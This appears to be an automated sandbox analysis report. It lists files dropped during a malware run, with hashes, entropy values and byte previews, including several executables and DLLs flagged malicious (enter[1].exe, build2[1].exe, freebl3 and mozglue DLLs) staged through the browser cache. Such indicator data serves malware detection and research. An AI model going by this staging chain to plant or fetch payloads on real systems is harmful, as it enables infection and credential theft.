Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4293f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090733597544953
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBM1wuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEN6/tbz8hu3VlXr4CRo1
MD5:	472F9428CBA06B5B94B5AA1EF68BCA3E
SHA1:	23B009448E5AE52B7AD4ADDE292C0815098901F3
SHA-256:	C2B0B0D02E8225ABF76B72EB7804C50E13F513BD7CF74B9572C3C0D1C19DE17B
SHA-512:	155AF22D3E6B2D8E667BA00431AA3629092B7AB1806F263C74C4B9271CB259966A3483C4C1D13AAF791A89026DF6A1CA37D61CFA4F7EA602F2B0933E6FB120DB
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF45020.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090733597544953
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBM1wuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEN6/tbz8hu3VlXr4CRo1
MD5:	472F9428CBA06B5B94B5AA1EF68BCA3E
SHA1:	23B009448E5AE52B7AD4ADDE292C0815098901F3
SHA-256:	C2B0B0D02E8225ABF76B72EB7804C50E13F513BD7CF74B9572C3C0D1C19DE17B
SHA-512:	155AF22D3E6B2D8E667BA00431AA3629092B7AB1806F263C74C4B9271CB259966A3483C4C1D13AAF791A89026DF6A1CA37D61CFA4F7EA602F2B0933E6FB120DB
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	50
Entropy (8bit):	3.9904355005135823
Encrypted:	false
SSDEEP:	3:0xXF/XctY5GUf+:0RFeUf+
MD5:	E144AFBFB9EE10479AE2A9437D3FC9CA
SHA1:	5AAAC173107C688C06944D746394C21535B0514B
SHA-256:	EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
SHA-512:	837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
Malicious:	false
Preview:	topTraffic_170540185939602997400506234197983529371

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
SHA-512:	58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d65f1af3-41e1-4a68-be4e-67eda4382949.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44596
Entropy (8bit):	6.096276160318626
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBYwuahDO6vP6OyJiTFuWX7cGoup1Xl3jVzXr4CCAg:z/Ps+wsI7ynEy6vchu3VlXr4CRo1
MD5:	F8109DB23A9193503014FCCDB1A08ED7
SHA1:	40BB46C37137CAE3405D1C2B24FF3B52D7B893DC
SHA-256:	468DAEA9FB7592AFB9BC392EC4A3D051EAA61A622D66A2865FA973E71CBF63B7
SHA-512:	58B3C6DB69A73CC3FDD076D367957CBF7F0D5EA325248B441A71495AFCCED17FEF05D7F700E07EC9458345CA42E615D4961C09BDD4CCA1C829185DEA8E9EE72C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f6f1d48b-780b-4ad1-aa1d-d4291dccb5b1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44596
Entropy (8bit):	6.096276160318626
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBYwuahDO6vP6OyJiTFuWX7cGoup1Xl3jVzXr4CCAg:z/Ps+wsI7ynEy6vchu3VlXr4CRo1
MD5:	F8109DB23A9193503014FCCDB1A08ED7
SHA1:	40BB46C37137CAE3405D1C2B24FF3B52D7B893DC
SHA-256:	468DAEA9FB7592AFB9BC392EC4A3D051EAA61A622D66A2865FA973E71CBF63B7
SHA-512:	58B3C6DB69A73CC3FDD076D367957CBF7F0D5EA325248B441A71495AFCCED17FEF05D7F700E07EC9458345CA42E615D4961C09BDD4CCA1C829185DEA8E9EE72C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.8436374695691176
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxnyxl9Il8uUxfJGmm0HrJzrTOAb89d1rc:m0WYOM0HrJfTj/
MD5:	43825E52A97A767F9FBA46640AF8DACC
SHA1:	EADF604BD7C91E6CD080EB335E283AF1866D1003
SHA-256:	372EFB8D275A9628CF8474B43B30AC11E22F8D9FE30884582274E0DE64B9AD3A
SHA-512:	6579BB19C6EB1405A9A808739834AAA64AF85841FC961FA3F8AD357E7312C15BB5F8DB6B23263E98B55E2F2F3BC792C92BD7A0433A84C61CE606337927FB833F
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.E.E.g.4.H.z.f.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.m.K.u.u.r.O.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	3.996105830923272
Encrypted:	false
SSDEEP:	96:8YOcqLgkn9A6vteXrXLHtMAzfjipVXGZCdsOUpGa:8y2Bm6oXlLz8IpGa
MD5:	41E6B45C5FE31D800FFAF9E6073BAFFB
SHA1:	58065B40E0B0C790313B68F34D7E4EE3325C31B0
SHA-256:	5FA029910B2418FEF3BF0F7680ACEBC0A2AF898C6DE1CE19C01C4BB6B1C9FA11
SHA-512:	8E1A1C09C9442ABF3D2229F6CC3BD75BFD7851BD37C59F83A971B148E8B78F2A8BB712280D94D25E62F4DA23F4927C8DB87BD61BC9AA75D67FC6C4913EB51675
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".B.+.z.E.x.X.T.f.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.m.K.u.u.r.O.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\enter[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1895424
Entropy (8bit):	7.946319035195088
Encrypted:	false
SSDEEP:	49152:S5WXLsGq0QhKVNxzqwp48K5eyCDUcTDqDYomPW:us85c+GK5eyCDUcTDqMome
MD5:	2985641A4880DB928DCF810EAA14041D
SHA1:	42E4ADE4D2329E61D2EAED9564074B41446F5594
SHA-256:	9104F6DBC8F28E0D3AA82F73D0771550A9652C4F6989013C1D6E0779B52CD6C8
SHA-512:	1767FC695A118AC4D3DC17D547CA3704CDB3A5154899B3AB8E7015D5A08210AACE9DC584CAE34AE3EC26FF2555E61D6277A57CF2269551F5EEC947C03424455D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f..............................J...........@...........................K.....(L....@.................................W...k............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .@*.........................@...owfltkii......0.....................@...lwtisuou......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build2[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2755072
Entropy (8bit):	6.7088219977074095
Encrypted:	false
SSDEEP:	49152:wXduhClX5Td3dKHJH2u4DTUN8A0AAlFnK9O5JDW0ZX+Gh8e9waVp/EoQ4PKw/n0+:LkUixA0Zea
MD5:	410E91A252FFE557A41E66A174CD6DCB
SHA1:	54B311D2C9909AC9F03D26B30DB6C94DADDE4CDB
SHA-256:	67CE38DEC54FD963FF28F4A257D58133EB241C909F9E06C859DE0A7F00976202
SHA-512:	98B7547A8F41A92899EF018125DF551BDD085AC2444A4542EE9FC1E44388DE6824C5B41600BA8B73FEB97DD882DA0C5A9844EF73509565A3BE3A2DC00C10F06D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..................'.....`.............@..............................0......q...`... ...............................................0.......0.8.....)..L............0..............................n).(...................X.0..............................text.....'.......'.................`..`.data...`.....'.......'.............@....rdata........(.......(.............@..@.pdata...L....)..N...h).............@..@.xdata..0B....)..D....).............@..@.bss.....^... ..........................idata........0.......).............@....CRT....X.....0....................@....tls..........0....................@....rsrc...8.....0....................@..@.reloc........0.......*.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
